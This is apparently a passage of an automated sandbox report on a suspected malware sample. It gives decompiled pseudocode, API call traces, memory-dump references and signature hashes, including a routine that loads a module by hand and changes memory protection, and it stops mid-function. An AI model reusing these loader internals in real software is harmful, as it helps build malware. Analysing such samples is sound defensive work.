Function 02CE7EFD, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;

				_t14 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x2ced23c) == 0) {
						E02CE4DB1();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x2ced23c) == 1) {
						_t10 = E02CE2789(_t11, _t12, _a4); // executed
						if(_t10 != 0) {
							_t14 = 0;
						}
					}
				}
				return _t14;
			}

0x02ce7f04
0x02ce7f05
0x02ce7f08
0x02ce7f3a
0x02ce7f3c
0x02ce7f3c
0x02ce7f0a
0x02ce7f0b
0x02ce7f20
0x02ce7f27
0x02ce7f29
0x02ce7f29
0x02ce7f27
0x02ce7f0b
0x02ce7f44

APIs

InterlockedIncrement.KERNEL32(02CED23C), ref: 02CE7F12

Part of subcall function 02CE2789: HeapCreate.KERNEL32(00000000,00400000,00000000,?,00000001,?,?,?,02CE7F25,?), ref: 02CE279C

InterlockedDecrement.KERNEL32(02CED23C), ref: 02CE7F32

Memory Dump Source

Source File: 00000011.00000002.529940632.0000000002CE1000.00000020.00020000.sdmp, Offset: 02CE0000, based on PE: true

Associated: 00000011.00000002.529881396.0000000002CE0000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530095614.0000000002CEC000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.530191336.0000000002CED000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530233997.0000000002CEF000.00000002.00020000.sdmp Download File

Similarity

API ID: Interlocked$CreateDecrementHeapIncrement
String ID:
API String ID: 3834848776-0
Opcode ID: c5a0196c6830c4798046a92bbf194cc6e2883445147491bd0bd3fe774ee5bdf9
Instruction ID: 260661060d5b8679c4155d6e2035c45d609530e53f32d8a3e2c1a6356dc56ec2
Opcode Fuzzy Hash: c5a0196c6830c4798046a92bbf194cc6e2883445147491bd0bd3fe774ee5bdf9
Instruction Fuzzy Hash: 6EE08C3124816293AF256AB4C849B6EE688AB80B84F019A64F883D1010E713CA64E6E7

Uniqueness

Uniqueness Score: -1.00%

Function 02CE7DDD, Relevance: 1.6, APIs: 1, Instructions: 80
registryCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E02CE7DDD(char _a4, void* _a8, void* _a12, intOrPtr _a16, intOrPtr* _a20, intOrPtr* _a24) {
				long _t26;
				intOrPtr* _t38;
				long _t39;
				intOrPtr _t42;
				long _t43;
				intOrPtr* _t44;

				if(_a4 == 0) {
					L2:
					_t26 = RegOpenKeyW(_a8, _a12,  &_a12); // executed
					_t43 = _t26;
					if(_t43 == 0) {
						_t44 =  *0x2ced0c4; // 0x2ceaaef
						 *_t44(_a12, _a16, 0,  &_a8, 0,  &_a4);
						if(_a4 == 0) {
							_t43 = 0xe8;
						} else {
							_t42 = E02CE1525(_a4);
							if(_t42 == 0) {
								_t43 = 8;
							} else {
								_t43 =  *_t44(_a12, _a16, 0,  &_a8, _t42,  &_a4);
								if(_t43 != 0) {
									E02CE8B22(_t42);
								} else {
									 *_a20 = _t42;
									_t38 = _a24;
									if(_t38 != 0) {
										 *_t38 = _a4;
									}
								}
							}
						}
						 *0x2ced0cc(_a12);
					}
					L12:
					return _t43;
				}
				_t39 = E02CE4614(_a4, _a8, _a12, _a16, _a20, _a24); // executed
				_t43 = _t39;
				if(_t43 == 0) {
					goto L12;
				}
				goto L2;
			}

0x02ce7de9
0x02ce7e0c
0x02ce7e16
0x02ce7e1c
0x02ce7e20
0x02ce7e22
0x02ce7e38
0x02ce7e3d
0x02ce7e85
0x02ce7e3f
0x02ce7e47
0x02ce7e4b
0x02ce7e82
0x02ce7e4d
0x02ce7e5f
0x02ce7e63
0x02ce7e79
0x02ce7e65
0x02ce7e68
0x02ce7e6a
0x02ce7e6f
0x02ce7e74
0x02ce7e74
0x02ce7e6f
0x02ce7e63
0x02ce7e4b
0x02ce7e8d
0x02ce7e8d
0x02ce7e94
0x02ce7e9a
0x02ce7e9a
0x02ce7dfd
0x02ce7e02
0x02ce7e06
0x00000000
0x00000000
0x00000000

APIs

RegOpenKeyW.ADVAPI32(80000002,03BA9EAA,03BA9EAA), ref: 02CE7E16

Part of subcall function 02CE4614: SafeArrayDestroy.OLEAUT32(00000000), ref: 02CE469C

Part of subcall function 02CE8B22: HeapFree.KERNEL32(00000000,00000000,02CE131A,00000000,?,?,00000000), ref: 02CE8B2E

Memory Dump Source

Source File: 00000011.00000002.529940632.0000000002CE1000.00000020.00020000.sdmp, Offset: 02CE0000, based on PE: true

Associated: 00000011.00000002.529881396.0000000002CE0000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530095614.0000000002CEC000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.530191336.0000000002CED000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530233997.0000000002CEF000.00000002.00020000.sdmp Download File

Similarity

API ID: ArrayDestroyFreeHeapOpenSafe
String ID:
API String ID: 4101316271-0
Opcode ID: e4940670482209b9cd0221a8983887258fa0259e5e4c7cdc1860896dec056598
Instruction ID: 89b0d96e04cbf7d78b29f4f996435dcfea94f157a9329e458dfe499a1cd49101
Opcode Fuzzy Hash: e4940670482209b9cd0221a8983887258fa0259e5e4c7cdc1860896dec056598
Instruction Fuzzy Hash: 8521EC73500159FFDF11AF94DC808EEBBAEFB48250B098525FE169B120D7329E659BA0

Uniqueness

Uniqueness Score: -1.00%

Function 02CE4614, Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E02CE4614(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr* _a20, intOrPtr* _a24) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t20;
				void* _t22;
				void* _t31;
				intOrPtr _t36;
				intOrPtr _t37;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t20 =  *0x2ced2a8; // 0xeba5a8
				_t4 = _t20 + 0x2cee10c; // 0x3ba86b4
				_t6 = _t20 + 0x2cee2c0; // 0x650047
				_t36 = 0;
				_t22 = E02CE76E7(_t4, _a4, _a8, _a12, _t6, _a16, _t4,  &_v20); // executed
				if(_t22 < 0) {
					_t31 = _t22;
				} else {
					_t31 = 0;
					if(_v20 != 0x2011) {
						_t31 = 1;
					} else {
						_t37 =  *((intOrPtr*)(_v12 + 0x10));
						if(_t37 != 0) {
							_t36 = E02CE1525(_t37);
							if(_t36 == 0) {
								_t31 = 8;
							} else {
								E02CEA789(_t37,  *((intOrPtr*)(_v12 + 0xc)), _t36);
							}
						}
						 *_a20 = _t36;
						 *_a24 = _t37;
						__imp__#16(_v12);
					}
				}
				return _t31;
			}

0x02ce461f
0x02ce4626
0x02ce4627
0x02ce4628
0x02ce4629
0x02ce462f
0x02ce4634
0x02ce463e
0x02ce4648
0x02ce4650
0x02ce4657
0x02ce46a7
0x02ce4659
0x02ce465e
0x02ce4664
0x02ce46a4
0x02ce4666
0x02ce4669
0x02ce466e
0x02ce4676
0x02ce467a
0x02ce468e
0x02ce467c
0x02ce4685
0x02ce4685
0x02ce467a
0x02ce4695
0x02ce469a
0x02ce469c
0x02ce469c
0x02ce4664
0x02ce46af

APIs

Part of subcall function 02CE76E7: SysFreeString.OLEAUT32(?), ref: 02CE77C6

SafeArrayDestroy.OLEAUT32(00000000), ref: 02CE469C

Part of subcall function 02CE1525: RtlAllocateHeap.NTDLL(00000000,00000000,02CE1278), ref: 02CE1531

Memory Dump Source

Source File: 00000011.00000002.529940632.0000000002CE1000.00000020.00020000.sdmp, Offset: 02CE0000, based on PE: true

Associated: 00000011.00000002.529881396.0000000002CE0000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530095614.0000000002CEC000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.530191336.0000000002CED000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530233997.0000000002CEF000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateArrayDestroyFreeHeapSafeString
String ID:
API String ID: 3028586731-0
Opcode ID: b3dc07b937d62840074db700fc0b7f250cbae571537eb3c361771aba718495ea
Instruction ID: 68d54a5a9bd4f9450caf0e3c89f96c8bc7da8a5a3023f29e491a8f7d023cf5e5
Opcode Fuzzy Hash: b3dc07b937d62840074db700fc0b7f250cbae571537eb3c361771aba718495ea
Instruction Fuzzy Hash: 3F11BF75600609AFCF15DFA9C840CAEB7BDFF88314B020555EA06DB220D770DA15DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00365F2B, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00348D42,00000000), ref: 00365F6C

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 016612aad66c92bee99ec62b7157350c4b0219d2bc17df57212587a7602ec1ac
Instruction ID: 8789ff0e4d2844ca9b6c9f1848469971fc7dd7040e12942c7f0136e199c490cd
Opcode Fuzzy Hash: 016612aad66c92bee99ec62b7157350c4b0219d2bc17df57212587a7602ec1ac
Instruction Fuzzy Hash: D6F0B431609A24EBDB235A66AC45A5A775CAF51761F1AC131AC15AF1D8CA20E81182A1

Uniqueness

Uniqueness Score: -1.00%

Function 6DA85CFE, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,6DA862A1,00000001,00000364,00000008,000000FF,?,6DA771A5,00000000,00000000,00000000,00000000,00000000), ref: 6DA85D3F

Memory Dump Source

Source File: 00000011.00000002.530977415.000000006D851000.00000020.00020000.sdmp, Offset: 6D850000, based on PE: true

Associated: 00000011.00000002.530970653.000000006D850000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.531353953.000000006DBC5000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.531449744.000000006DCB0000.00000008.00020000.sdmp Download File
Associated: 00000011.00000002.531458292.000000006DCB3000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.531465886.000000006DCB7000.00000008.00020000.sdmp Download File
Associated: 00000011.00000002.531479113.000000006DCC6000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.531486995.000000006DCCA000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.531496032.000000006DCCB000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 2ccbdcc7e70bc22285672a822c56e2afe0120e2ccbbbe78e520c1a28490df584
Instruction ID: 243bd8701620344cc07a3751ea7df3c4ac45a6bf218030b7b80b5edddc716acd
Opcode Fuzzy Hash: 2ccbdcc7e70bc22285672a822c56e2afe0120e2ccbbbe78e520c1a28490df584
Instruction Fuzzy Hash: BDF0243760C66566FF21CA268C08B7B3BADBF82660B058011AD26DB186CB34D881C2E0

Uniqueness

Uniqueness Score: -1.00%

Function 00367E1A, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00367E4C

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 0e40f9b5c8d887b7cfed49e4a35f46e1ff4d7bdfe4a2695e1b493eb96ce215f7
Instruction ID: ebe79219e8e94434e3c4732dba845b708785ab3f1dfd0ba9a43634e663e4c55f
Opcode Fuzzy Hash: 0e40f9b5c8d887b7cfed49e4a35f46e1ff4d7bdfe4a2695e1b493eb96ce215f7
Instruction Fuzzy Hash: 87E02B322182545BF73327759C05B5B774CAF51BE5F4681A0EC10AA59CCF13DC1881F1

Uniqueness

Uniqueness Score: -1.00%

Function 001BDB70, Relevance: 1.5, APIs: 1, Instructions: 24networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000002,00000002), ref: 001BDBA3

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: 6154704b0e3ac0596e3d99cf0b2a997c3f733daa2836d08ddbee65e2c5da9473
Instruction ID: 9249e5de45c110d731b6c10a0181b8119cca6133a7ab464ba47e5f5366b22c99
Opcode Fuzzy Hash: 6154704b0e3ac0596e3d99cf0b2a997c3f733daa2836d08ddbee65e2c5da9473
Instruction Fuzzy Hash: 33E06D30A142048FD761AB2899567A9B3E8EB4A310F400A6ADA59CA280EB2578118797

Uniqueness

Uniqueness Score: -1.00%

Function 6DA767E8, Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6DA767FB

Part of subcall function 6DA85D5B: RtlFreeHeap.NTDLL(00000000,00000000,?,6DA76800,?,00000000,?,6DA68B9E,00000000,00000011,00000001), ref: 6DA85D71
Part of subcall function 6DA85D5B: GetLastError.KERNEL32(00000000,?,6DA76800,?,00000000,?,6DA68B9E,00000000,00000011,00000001), ref: 6DA85D83

Memory Dump Source

Source File: 00000011.00000002.530977415.000000006D851000.00000020.00020000.sdmp, Offset: 6D850000, based on PE: true

Associated: 00000011.00000002.530970653.000000006D850000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.531353953.000000006DBC5000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.531449744.000000006DCB0000.00000008.00020000.sdmp Download File
Associated: 00000011.00000002.531458292.000000006DCB3000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.531465886.000000006DCB7000.00000008.00020000.sdmp Download File
Associated: 00000011.00000002.531479113.000000006DCC6000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.531486995.000000006DCCA000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.531496032.000000006DCCB000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFreeHeapLast_free
String ID:
API String ID: 1353095263-0
Opcode ID: 92f937141baf9322223fe1566c7731c72839e6b40fda96cfda013d5640f7fe83
Instruction ID: 300765f1115c6dc100bcaf2c6ecf9200dbd63ee8be7ad7a69f0f16cf872405ee
Opcode Fuzzy Hash: 92f937141baf9322223fe1566c7731c72839e6b40fda96cfda013d5640f7fe83
Instruction Fuzzy Hash: C1C08C32004208FBDB00CF41C90AA4E7BA8DB80268F200048EC0617250CBB1EE409680

Uniqueness

Uniqueness Score: -1.00%

Function 001A136F, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E001A136F(void* __eax, intOrPtr _a4) {

				 *0x1a3110 =  *0x1a3110 & 0x00000000;
				_push(0);
				_push(0x1a310c);
				_push(1);
				_push(_a4);
				 *0x1a3108 = 0xc; // executed
				L001A1746(); // executed
				return __eax;
			}

0x001a136f
0x001a1376
0x001a1378
0x001a137d
0x001a137f
0x001a1383
0x001a138d
0x001a1392

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(001A13F1,00000001,001A310C,00000000), ref: 001A138D

Memory Dump Source

Source File: 00000011.00000002.525816570.00000000001A1000.00000040.00020000.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000011.00000002.525798200.00000000001A0000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.525835370.00000000001A4000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.525846743.00000000001A6000.00000040.00020000.sdmp Download File

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: 80fe37b02e77804687e5a1ac8e93ae6dcf4bbfe7de59d61711dbcfa7a334a48f
Instruction ID: ae3fb4d2f2186bf593a1191e010dd66684f7bb87095461f20d2ed575cc758402
Opcode Fuzzy Hash: 80fe37b02e77804687e5a1ac8e93ae6dcf4bbfe7de59d61711dbcfa7a334a48f
Instruction Fuzzy Hash: 87C04C78284300B6E6109B409C46F45BA51B763715F105508B120245D183F552948915

Uniqueness

Uniqueness Score: -1.00%

Function 001A1D7E, Relevance: 1.3, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E001A1D7E(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t24;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x1a3100;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x1a3100 - 0x69b24f45 &  !( *0x1a3100 - 0x69b24f45);
				_t18 = E001A1000( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x1a3100 - 0x69b24f45 &  !( *0x1a3100 - 0x69b24f45),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x1a3100 - 0x69b24f45 &  !( *0x1a3100 - 0x69b24f45), _t16 + 0x964da0fc,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E001A10E4(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t24 = E001A1264(_t40, _t44); // executed
						_t29 = _t24;
						if(_t29 == 0) {
							_t26 = E001A1BAE(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E001A17CB(_t42);
					L8:
					return _t29;
				}
			}

0x001a1d86
0x001a1d88
0x001a1da4
0x001a1db5
0x001a1dbc
0x001a1e1a
0x00000000
0x001a1dbe
0x001a1dbe
0x001a1dc8
0x001a1dcc
0x001a1dd1
0x001a1dd4
0x001a1dd9
0x001a1ddd
0x001a1de2
0x001a1de7
0x001a1deb
0x001a1df0
0x001a1df1
0x001a1df5
0x001a1dfa
0x001a1e02
0x001a1e02
0x001a1dfa
0x001a1deb
0x001a1ddd
0x001a1e04
0x001a1e0d
0x001a1e11
0x001a1e1b
0x001a1e21
0x001a1e21

APIs

Part of subcall function 001A1000: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,001A1DBA,?,?,?,?,?,00000002,?,?), ref: 001A1024
Part of subcall function 001A1000: GetProcAddress.KERNEL32(00000000,?), ref: 001A1046
Part of subcall function 001A1000: GetProcAddress.KERNEL32(00000000,?), ref: 001A105C
Part of subcall function 001A1000: GetProcAddress.KERNEL32(00000000,?), ref: 001A1072
Part of subcall function 001A1000: GetProcAddress.KERNEL32(00000000,?), ref: 001A1088
Part of subcall function 001A1000: GetProcAddress.KERNEL32(00000000,?), ref: 001A109E

Part of subcall function 001A10E4: memcpy.NTDLL(00000002,?,001A1DC8,?,?,?,?,?,001A1DC8,?,?,?,?,?,?,?), ref: 001A111B
Part of subcall function 001A10E4: memcpy.NTDLL(00000002,?,?,?,00000002), ref: 001A1150

Part of subcall function 001A1264: LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 001A129C

Part of subcall function 001A1BAE: VirtualProtect.KERNEL32(00000000,?,?,?,?,?,00000000,?,?), ref: 001A1BE7
Part of subcall function 001A1BAE: VirtualProtect.KERNEL32(00000000,?,?,?), ref: 001A1C5C
Part of subcall function 001A1BAE: GetLastError.KERNEL32 ref: 001A1C62

GetLastError.KERNEL32(?,?), ref: 001A1DFC

Memory Dump Source

Source File: 00000011.00000002.525816570.00000000001A1000.00000040.00020000.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000011.00000002.525798200.00000000001A0000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.525835370.00000000001A4000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.525846743.00000000001A6000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
String ID:
API String ID: 2673762927-0
Opcode ID: 2ae27d51eee921e5cf1bc320c2ec9698fe4bdd52904ae5acbb2545c14d6f605f
Instruction ID: e782ce2ffcdd68d155bce4abcc9b3c50f034abdbe84661b2383e8f06f2ab96f5
Opcode Fuzzy Hash: 2ae27d51eee921e5cf1bc320c2ec9698fe4bdd52904ae5acbb2545c14d6f605f
Instruction Fuzzy Hash: 2F11C87A600711BBD722AA958D80DEB77FCAF9A324F044559FF0297501EB60ED058790

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00205D70, Relevance: 30.2, APIs: 16, Strings: 1, Instructions: 468libraryloadertimeCOMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00205E91
CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 00205EA1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00205ECB
GetModuleHandleA.KERNEL32(0039B6F4,0039B6E0,?,?,000F4240,00000000), ref: 00205F1F
GetProcAddress.KERNEL32(00000000), ref: 00205F26
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00205FB9
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00205FD9
WaitForMultipleObjectsEx.KERNEL32(0038CA2D,001DCD0A,00000000,00000000,00000000,?,?,000F4240,00000000), ref: 00206017
CloseHandle.KERNEL32(00000000,?,?,000F4240,00000000), ref: 00206043
QueryPerformanceFrequency.KERNEL32(?,?,?,000F4240,00000000), ref: 00206093
QueryPerformanceCounter.KERNEL32(?,?,?,000F4240,00000000), ref: 002060C8
QueryPerformanceCounter.KERNEL32(?,?,?,000F4240,00000000), ref: 002060DC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00206147
CloseHandle.KERNEL32(00000000,?,?,000F4240,00000000), ref: 0020619A
ResetEvent.KERNEL32(00000000,?,?,000F4240,00000000), ref: 002061B5
GetCurrentProcessId.KERNEL32(00000000,?,004A41E8,?,?,000F4240,00000000), ref: 0020626C

Strings

e-flag, xrefs: 002061F9

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$HandlePerformanceQuery$CloseCounter$AddressCreateCurrentEventFrequencyModuleMultipleObjectsProcProcessResetTimerWaitWaitable
String ID: e-flag
API String ID: 4212561240-538632313
Opcode ID: 3b8128bbb0e74894a3a51ea3cbbd0fa65f594e5cd4f560ecdb2c139535e0f3df
Instruction ID: 3286f189d1ddd831f6922fa9a3001a85ad78c942dd0f32355b36071f40d8d4ad
Opcode Fuzzy Hash: 3b8128bbb0e74894a3a51ea3cbbd0fa65f594e5cd4f560ecdb2c139535e0f3df
Instruction Fuzzy Hash: F60201719207599BDB25CF78CC89BAEB7B5FF58310F144629E811AB2C2E734A961CB10

Uniqueness

Uniqueness Score: -1.00%

Function 001BF6D0, Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 393networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 001BF71C
setsockopt.WS2_32(00000000,0000FFFF,00000004,00000001,00000004), ref: 001BF7B8
bind.WS2_32(00000000,?,00000010), ref: 001BF800

Part of subcall function 001BEDE0: WSAGetLastError.WS2_32 ref: 001BEE40

getsockname.WS2_32(00000000,?,?), ref: 001BF857
listen.WS2_32(00000000,7FFFFFFF), ref: 001BF8BD
WSASocketW.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 001BF8ED
connect.WS2_32(00000000,?,00000010), ref: 001BF949
accept.WS2_32(00000000,00000000,00000000), ref: 001BF997
ioctlsocket.WS2_32(00000010,8004667E,00000001), ref: 001BFA41
setsockopt.WS2_32(00000010,00000006,00000001,00000001,00000004), ref: 001BFA9C
ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 001BFAE3
setsockopt.WS2_32(00000000,00000006,00000001,00000001,00000004), ref: 001BFB1D

Strings

socket_select_interrupter, xrefs: 001BFB85, 001BFB92, 001BFB9F
PkH, xrefs: 001BF715, 001BF7A1, 001BF83E, 001BF8AE, 001BF938, 001BF989, 001BFA2E, 001BFA88, 001BFAD0, 001BFB56, 001BFBC4

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: setsockopt$Socketioctlsocket$ErrorLastacceptbindconnectgetsocknamelisten
String ID: PkH$socket_select_interrupter
API String ID: 4018613995-976291482
Opcode ID: 92912616cdf3e258e5e53f3c4b42a414cb028554b58da94138d59956751a14c3
Instruction ID: 0b7b8406ff0f30a0b22d463bf30cb4dd79c690184e618cf3ab33ad3d8ce8ac8d
Opcode Fuzzy Hash: 92912616cdf3e258e5e53f3c4b42a414cb028554b58da94138d59956751a14c3
Instruction Fuzzy Hash: 31F18071D002089ADF20DBB8DC84BEDBBB4EF19328F14871EE521772D0EBB559898B54

Uniqueness

Uniqueness Score: -1.00%

Function 001C03A0, Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 392networksleepCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(?), ref: 001C03E9
RtlLeaveCriticalSection.NTDLL(?), ref: 001C05EA
Sleep.KERNEL32(?,?), ref: 001C0653
select.WS2_32(00000002,?,?,?,00000000), ref: 001C069F
__WSAFDIsSet.WS2_32(?,?), ref: 001C06C8
WSARecv.WS2_32(?,00000400,00000001,00000000,?,00000000,00000000), ref: 001C0722
WSAGetLastError.WS2_32 ref: 001C072E
RtlLeaveCriticalSection.NTDLL(?), ref: 001C0993

Strings

M', xrefs: 001C0782
PkH, xrefs: 001C0613, 001C07EB, 001C07F0, 001C0888
F', xrefs: 001C0758

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: CriticalSection$Leave$EnterErrorLastRecvSleepselect
String ID: F'$M'$PkH
API String ID: 4028809722-4261781330
Opcode ID: 4d5f10fdf1e6bafeb3b4eacff94039fe0d5b4124ff7b79c683b74cc7777a1be4
Instruction ID: 062fc8caac6b9ade5ab557049e899ace2bf14fa4610574a9b31e4d0ebe1925e0
Opcode Fuzzy Hash: 4d5f10fdf1e6bafeb3b4eacff94039fe0d5b4124ff7b79c683b74cc7777a1be4
Instruction Fuzzy Hash: 6C027FB1A00214CFDB25DF14CC84B99B7B9EF58310F4445ADEA499B256DB30EE84CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 001C10D0, Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 301networkCOMMON

Download Yara Rule

APIs

WSAIoctl.WS2_32(?,C8000006,?,?,?,00000010,?,00000004,?), ref: 001C117E
bind.WS2_32(?,?,0000001C), ref: 001C1214
PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 001C1273
RtlEnterCriticalSection.NTDLL(00000001), ref: 001C1285
RtlLeaveCriticalSection.NTDLL(00000001), ref: 001C12B2

Strings

PkH, xrefs: 001C11F0, 001C1307, 001C13AF, 001C1429, 001C14B2

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: CriticalSection$CompletionEnterIoctlLeavePostQueuedStatusbind
String ID: PkH
API String ID: 3078511837-1844677740
Opcode ID: 6764813adda1858257268b22f20a49c8b2283a7cc6c7fa43bc0bfc0df1f53534
Instruction ID: 9ca5d91c5c236d33deaed1a6db1f5b0d02eb04c60de46b6e9000a336dd0e8495
Opcode Fuzzy Hash: 6764813adda1858257268b22f20a49c8b2283a7cc6c7fa43bc0bfc0df1f53534
Instruction Fuzzy Hash: CCC1CB70604345AFC715DF24C884B5AB7F4FF9A318F108A1EF8899B691EB74E944CB82

Uniqueness

Uniqueness Score: -1.00%

Function 02CE7FBE, Relevance: 12.3, APIs: 8, Instructions: 258
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E02CE7FBE(int* __ecx) {
				int _v8;
				void* _v12;
				void* _v16;
				void* __esi;
				signed int _t28;
				signed int _t33;
				signed int _t39;
				char* _t45;
				char* _t46;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				signed int _t61;
				intOrPtr _t64;
				signed int _t65;
				signed int _t70;
				void* _t72;
				void* _t73;
				signed int _t75;
				signed int _t78;
				signed int _t82;
				signed int _t86;
				signed int _t90;
				signed int _t94;
				signed int _t98;
				void* _t103;
				intOrPtr _t121;

				_t104 = __ecx;
				_t28 =  *0x2ced2a4; // 0x69b25f44
				if(E02CE6247( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x90) {
					 *0x2ced2d8 = _v8;
				}
				_t33 =  *0x2ced2a4; // 0x69b25f44
				if(E02CE6247( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
					_v12 = 2;
					L69:
					return _v12;
				}
